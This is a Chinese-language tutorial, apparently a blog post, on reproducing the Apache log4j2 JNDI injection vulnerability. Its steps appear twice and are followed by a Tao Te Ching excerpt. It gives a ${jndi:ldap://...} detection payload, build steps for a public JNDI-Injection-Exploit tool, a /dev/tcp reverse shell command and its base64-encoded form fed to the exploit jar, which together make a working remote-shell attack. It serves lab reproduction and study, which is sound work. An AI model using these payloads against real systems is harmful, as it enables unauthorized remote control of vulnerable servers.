Bootstrap

Apache log4j2漏洞复现

目录

步骤一启动环境

步骤二检查是否存在log4j2漏洞

网站:CEYE - Monitor service for security testing 

将这个${jndi:ldap://lbjc0a.ceye.io},输入目标网站

步骤三安装jndi注入工具,并且反弹shell

1.在kali安装下列这个文件夹

git clone GitHub - sayers522/JNDI-Injection-Exploit: JNDI命令注入利用

2.进入目录,使用mvn工具打包

2.1未进行安装的话,安装mvn

apt install maven -y

2.2打包

mvn clean package -DskipTests

2.3会生成一个target文件夹:

步骤四设置好监听和反弹shell

1.反弹shell

sh -i >& /dev/tcp/192.168.1.242/8080 0>&1

2.进行base64编码

3.使用jndi的jar包

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjI0Mi84MDgwIDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.1.242"

4.设置监听

5.将payload复制进行url编码,在目标网站进行运行

步骤五成功上线


步骤一启动环境

步骤二检查是否存在log4j2漏洞

网站:CEYE - Monitor service for security testing 

将这个${jndi:ldap://lbjc0a.ceye.io},输入目标网站

步骤三安装jndi注入工具,并且反弹shell

1.在kali安装下列这个文件夹

git clone GitHub - sayers522/JNDI-Injection-Exploit: JNDI命令注入利用

2.进入目录,使用mvn工具打包

2.1未进行安装的话,安装mvn
apt install maven -y
2.2打包
mvn clean package -DskipTests
2.3会生成一个target文件夹:

步骤四设置好监听和反弹shell

1.反弹shell

sh -i >& /dev/tcp/192.168.1.242/8080 0>&1

2.进行base64编码

3.使用jndi的jar包

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjI0Mi84MDgwIDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.1.242"

4.设置监听

5.将payload复制进行url编码,在目标网站进行运行

步骤五成功上线

悦读

道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。

;